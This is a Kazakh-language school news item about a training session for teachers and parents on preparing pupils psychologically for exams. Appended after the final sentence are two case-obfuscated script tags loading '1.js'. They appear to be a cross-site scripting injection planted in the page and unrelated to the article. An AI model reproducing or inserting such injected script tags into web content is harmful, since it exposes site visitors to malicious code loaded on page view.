2024 жылғы 30 қаңтар күні "Жалтыр ауылының №3 жалпы орта білім беретін мектебі" КММ-нде педагог- психолог А.Боранбаеваның ұйымдастыруымен 4,9-сыныптары мұғалімдері мен ата-аналарына арналған «Білім алушылардың білім жетістіктері мониторингіне дайындық деңгейін бақылау» тақырыбында тренинг өтті. Мақсаты: ата-аналардың психологиялық білімін кеңейту, ата-аналарға кеңес беру, баланың емтиханға дайындығының оңтайлы өтуіне ықпал ету, емтихан кезінде пайда болатын қиындықтар мен қорқынышты жеңуге көмектесу, олардың уақытша психологиялық қиындықтар екенін түсіндіру. Сонымен қатар, баланы емтиханға психологиялық тұрғыдан дайындаудың маңыздылығы туралы ақпарат берілді. Мектептің педагог- психологімен бірге сынып жетекшілер де белсене ат салысты. Танымдық және психологиялық пайдасы зор іс-шара болды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>